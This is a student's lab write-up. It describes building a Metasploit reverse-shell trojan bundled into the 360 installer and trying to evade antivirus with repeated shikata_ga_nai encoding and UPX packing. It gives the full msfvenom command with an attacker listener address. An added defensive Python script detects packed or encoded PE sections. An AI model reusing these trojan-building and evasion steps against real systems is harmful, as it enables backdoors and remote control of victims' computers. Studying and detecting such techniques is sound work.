Metasploit: implementing a Trojan, bundling it into another executable, and evading antivirus detection

1. Preliminary knowledge
(1) Metasploit
Metasploit is an open-source security vulnerability detection tool, formally called the Metasploit Framework (MSF). MSF is an exploitation framework in which users can develop their own vulnerability scripts for testing. The architecture of Metasploit:
[Figure: Metasploit architecture diagram. Image source: Metasploit series (first episode)]
Base library files:
- Rex: the basic library of Metasploit, supporting different protocols, transformations and socket handling
- MSF Core: defines the framework and provides the basic application interface for Metasploit
- MSF Base: provides a simplified, user-friendly application interface on top of MSF Core
Modules: the implementation code for the core penetration-testing capabilities, loaded, integrated and exposed externally by the Metasploit framework
2. Experiments
(1) Select the attack payload
Enter msfconsole to open the Metasploit console:
Enter show payloads to view all available attack payloads:
In this experiment we used windows/shell_reverse_tcp (a simple reverse shell: the target machine connects back to the attacker and exposes a command line).
(2) Select the file to bundle with
You can create a standalone EXE file, or bundle the payload into another EXE file. This experiment chose bundling, and I used the 360 installer (360.exe) as the carrier.
(3) Evading antivirus detection
The goal is to make a Trojan that bypasses antivirus detection. One way to do this within the Metasploit framework is to use the MSF encoders. Enter msfvenom -l encoders
to view the available encoding methods (not all encoders are available for Windows):
The experiment selected x86/shikata_ga_nai:
(4) Generation, bundling and evasion
Lab environment:
Attacker: Kali Linux, IP 192.168.177.133
Target machine: Windows 7, IP 192.168.177.1
Command explanation:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.177.133 LPORT=8080 -e x86/shikata_ga_nai -x 360.exe -i 5 -f exe -o /root/backdoor.exe
- -p windows/shell_reverse_tcp: use the shell_reverse_tcp payload
- LHOST=192.168.177.133: set the attacker's IP address
- LPORT=8080: set the attacker's listening port, used to receive the Trojan's connection request
- -e x86/shikata_ga_nai: use the shikata_ga_nai encoder
- -x 360.exe: bundle the Trojan into 360.exe
- -i 5: encode the payload 5 times
- -f exe: set the MSF encoder output format to exe
- -o /root/backdoor.exe: set the output path of the processed file
Next, test it: on Kali, start the listener and wait for the Trojan to connect back:
Run the generated backdoor.exe on Windows 7; unfortunately, 360 detects and removes it:
Encode it several more times with different encoders:
After running it, 360 still detects and removes it:
Next, try packing it: enter upx to see the parameters of the UPX packer, then upx -5 backdoor.exe
backdoor.exe is now packed (it is compressed here; the drawback of packing is that it changes the size of the original file, a difference that experienced security staff can easily spot):
Embarrassing...... it is still detected, though you can see that the name of the detected Trojan has changed:
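The two failed evasion attempts above (encoding with shikata_ga_nai, then packing with UPX) each leave traces a defender can check for without running the file: UPX writes its own section names (UPX0/UPX1) into the PE section table, and both encoding and compression push the byte entropy of the payload section towards 8 bits per byte. The following Python script is an added example, not part of the original assignment or of Metasploit or UPX: it parses the PE section table and flags UPX section names and sections whose Shannon entropy is at or above 7.0 bits per byte. The threshold and the section-name list are heuristic assumptions chosen for the example, and the two sample images are constructed inline (they are not runnable programs, only headers laid out so the parser can walk them), so the script runs offline.

```python
import math
import struct

# Default section names that the UPX packer writes (UPX0/UPX1 are the usual pair).
UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}

# Heuristic: compressed or encoded code approaches 8 bits/byte; ordinary x86 code
# and text sit well below this. Threshold chosen for the example, not a standard.
ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data):
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(image):
    """Walk a PE image's section table; return a list of (name, raw_bytes)."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ/PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature missing")
    # COFF file header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, num_sections, _, _, _, size_opt, _ = struct.unpack_from("<HHIIIHH", image, e_lfanew + 4)
    table = e_lfanew + 4 + 20 + size_opt
    sections = []
    for i in range(num_sections):
        # IMAGE_SECTION_HEADER: Name[8], VirtualSize, VirtualAddress, SizeOfRawData,
        # PointerToRawData, then relocation/line-number fields and Characteristics
        fields = struct.unpack_from("<8sIIIIIIHHI", image, table + 40 * i)
        name = fields[0].rstrip(b"\x00").decode("ascii", "replace")
        raw_size, raw_ptr = fields[3], fields[4]
        sections.append((name, image[raw_ptr:raw_ptr + raw_size]))
    return sections


def triage(image, threshold=ENTROPY_THRESHOLD):
    """Return a list of packing/encoding indicators found in the image."""
    findings = []
    for name, data in parse_sections(image):
        if name in UPX_SECTION_NAMES:
            findings.append(f"section {name!r}: UPX packer section name")
        ent = shannon_entropy(data)
        if ent >= threshold:
            findings.append(f"section {name!r}: high entropy {ent:.2f} bits/byte")
    return findings


def build_minimal_pe(section_specs):
    """Build a tiny PE-shaped byte string from (name, data) pairs.

    Constructed for this example only: it has no optional header and is not runnable,
    it merely carries the headers that parse_sections() walks.
    """
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x014C, len(section_specs), 0, 0, 0, 0, 0x0102)
    raw_ptr = e_lfanew + 4 + 20 + 40 * len(section_specs)
    headers, bodies = b"", b""
    for name, data in section_specs:
        headers += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\x00"),
                               len(data), 0x1000, len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        bodies += data
        raw_ptr += len(data)
    return dos_header + b"PE\x00\x00" + coff + headers + bodies


# Constructed samples: an "ordinary" image with low-entropy sections, and a
# UPX-style image whose UPX1 section holds uniformly distributed bytes.
SAMPLE_PLAIN = build_minimal_pe([(".text", b"mov eax, 1; ret\r\n" * 40), (".data", b"\x00" * 512)])
SAMPLE_PACKED = build_minimal_pe([("UPX0", b""), ("UPX1", bytes(range(256)) * 4)])

if __name__ == "__main__":
    for label, image in (("plain", SAMPLE_PLAIN), ("packed", SAMPLE_PACKED)):
        print(f"{label}: {triage(image) or ['no indicators']}")
```

To apply it to a real file, read the bytes and pass them to triage(); the plain sample yields no findings, while the UPX-style sample is flagged twice for its section names and once for the 8.00 bits/byte entropy of UPX1. Section names are trivial to rename, so the entropy check is the more durable of the two signals, and a real triage pipeline would combine both with the file-size change the text mentions.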
Another problem encountered in the experiment: the Kali attack host could receive the Trojan's connection from the Windows 7 virtual machine on my own computer, but when Wang's Kali attacked my Windows 7 (on the same LAN) the listener received nothing. His computer could ping mine, but my pings to his did not get through. We checked that the firewall had been turned off, and suspect that the lab router has a security configuration in place.
Because this was my first contact with security systems and software, I thank classmate Wang for his guidance on this experiment; the problems encountered were solved after careful thought.
2017-2018-1 20179202 "Linux kernel Fundamentals and Analysis" 11th week assignment